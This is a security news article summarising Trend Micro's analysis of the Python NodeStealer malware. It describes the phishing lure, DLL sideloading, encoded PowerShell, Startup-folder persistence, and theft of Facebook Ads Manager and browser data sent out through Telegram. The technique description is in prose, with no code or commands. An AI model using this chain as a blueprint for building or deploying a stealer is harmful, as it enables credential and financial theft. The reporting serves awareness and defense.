Sunday, April 20, 2025
HomeCyber Security NewsNew Python NodeStealer Attacking Facebook Business To Steal Login Credentials

New Python NodeStealer Attacking Facebook Business To Steal Login Credentials

Published on

SIEM as a Service

Follow Us on Google News

NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets Facebook Ads Manager accounts, stealing sensitive financial and business data in addition to credit card details and browser information. 

The malware is delivered through spear-phishing emails with malicious links, uses DLL sideloading and encoded PowerShell for stealthy execution, and exfiltrates data via Telegram. 

Infection chain
Infection chain

The attack commenced with a spear-phishing email, disguised as a copyright infringement notice, delivered from a compromised Gmail account, which enticed recipients to click on a malicious link concealed within a seemingly innocuous PDF document. 

- Advertisement - Google News

Upon clicking, the infected PDF exploited vulnerabilities in the target devices, enabling the installation of stealthy malware. This insidious malware, once installed, secretly exfiltrated sensitive information from the compromised systems.

2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide

Email sample with the malicious embedded link 
Email sample with the malicious embedded link 

Clicking a malicious email link triggers the download of the zipped archive “Nombor Rekod 052881.zip.” Extracting the archive injects several suspicious files: “GHelper.dll” and “oledlg.dll” are likely Dynamic Link Libraries (DLLs) used by the malware. 

“Nombor Rekod 052881.exe” is the main executable file, while “hpreaderfprefs.dat” could be a data file for storing settings. 

The “images” folder contains a “.bat” batch script (“active-license.bat”) and a suspicious executable (“license-key.exe”), possibly used for licensing or further malicious actions, and  another archive, “license.rar,” might hold additional malware components. 

Malicious encoded PowerShell execution
Malicious encoded PowerShell execution

The Nombor Rekod 052881.exe PDF reader was exploited to sideload the malicious oledlg.dll, which masquerading as a legitimate system file, executed a batch script, images\active-license.bat, under the guise of the PDF reader. 

This batch script, in turn, triggered a PowerShell command, enabling the malware to operate undetected and carry out its malicious activities. 

A malicious PowerShell script hides its window, creates a folder, and unarchives a password-protected RAR file containing a portable Python interpreter, which downloads and executes a decoy PDF while simultaneously dropping a persistence mechanism in the Startup folder.

It also downloads the final malicious payload directly from a remote server using Python’s `requests` library and executes it in a hidden command prompt. 

Python script to execute Python bytecode directly
Python script to execute Python bytecode directly

It leverages obfuscation techniques to deliver an infostealer payload, as the malware initially downloads a Python script from a remote server and executes it in-memory, which decrypts and executes a second-stage payload, which is designed to steal sensitive information, including credit card data and web browser credentials. 

The malware also targets Facebook Ads Manager accounts to extract financial and business-related data, which is then exfiltrated to specific Telegram channels using a dedicated bot API. 

Targeting Facebook Ads Manager accounts
Targeting Facebook Ads Manager accounts

According to Trend Micro, NodeStealer, an advanced malware variant, targets Facebook Ads Manager accounts, credit card information, and browser data and employs sophisticated techniques to evade detection. 

To counter this threat, individuals and organizations should maintain vigilance against suspicious emails, educate users about phishing tactics, and regularly scan systems for malware. 

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Writing Effective Detection Rules With Sigma, YARA, And Suricata

In the ever-evolving world of cybersecurity, the ability to detect threats quickly and accurately...

How To Conduct End-to-End Forensics From Compromised Endpoint To Network Pivot

The discovery of a compromised endpoint in an organization's network marks the beginning of...

Building A Threat Detection Pipeline Using WAF Logs And External Intel Feeds

Organizations today face an ever-expanding threat landscape that requires sophisticated detection capabilities to identify...

10 Best Patch Management Tools 2025

In today's digital landscape, maintaining secure and efficient IT systems is critical for organizations....

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Writing Effective Detection Rules With Sigma, YARA, And Suricata

In the ever-evolving world of cybersecurity, the ability to detect threats quickly and accurately...

How To Conduct End-to-End Forensics From Compromised Endpoint To Network Pivot

The discovery of a compromised endpoint in an organization's network marks the beginning of...

Building A Threat Detection Pipeline Using WAF Logs And External Intel Feeds

Organizations today face an ever-expanding threat landscape that requires sophisticated detection capabilities to identify...